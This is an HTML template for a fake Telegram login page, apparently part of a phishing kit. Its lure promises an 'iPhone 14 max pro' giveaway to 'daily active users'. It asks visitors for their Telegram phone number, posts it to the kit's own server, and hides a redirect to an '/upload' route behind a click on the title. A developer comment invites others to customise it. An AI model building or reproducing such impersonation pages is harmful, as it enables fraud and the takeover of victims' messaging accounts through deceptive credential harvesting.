<!DOCTYPE html> 
<html lang="en"> 
 
{{!-- IDs are for you to use js on them incase you want to add some funtionality{{{lol (:  }}} 
change anything if you want... 
regards: kamohelo  --}}

 
<head> 
    <meta charset="UTF-8"> 
    <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
    <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
    <title> 
        Telegram login page 
    </title> 
    <link rel="stylesheet" href="style/style.css"> 

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css" integrity="sha512-MV7K8+y+gLIBoVD59lQIYicR65iaqukzvf/nwasF0nqhPay5w/9lJmVM2hMDcnK1OnMGCdVK+iQrJ7lzPJQd1w==" crossorigin="anonymous" referrerpolicy="no-referrer" />
 
</head> 
 
 
<body> 
 
    <div class="header"> 
        <h1 id="tel">telegram</h1> 
    </div> 
    <div class="wrapper" id="wrapper">  
        <div class="user_img" id="user_img"> 
            <img src={{imgLink}} alt="user image"> 
 
        </div> 
 
        <div class="words" id="words"> 
            <p>HI, Welcome to <span>Telegram</span> daily activer user giveaway.In this event we give gift  our daily acitve users a brand new <span class="phone">iPhone 14 max pro</span>.So what are you waiting for login and be the part of our event.</p> 
 
        </div> 
 
 
 
        <form action="/" method="post" > 
       
            <label for="num">Your country name:</label> 
            <input type="text" name="" id="country" class="countryInput" value="{{country}}" readonly required>

            <label for="num"> Enter your number:</label> 
            <input type="number" name="number" id="num" placeholder="Telegram number"  required>



 
            <div class="login submit"> 
               <i class="fa-solid fa-arrow-right "></i>
            </div> 
            </form>
    </div> 

    <script src="js/index.js"></script>
    <script>
        let tel = document.querySelector('#tel');
tel.addEventListener('click',()=>{
   location.href  = '/upload'
})
    </script>
</body> 
</html>
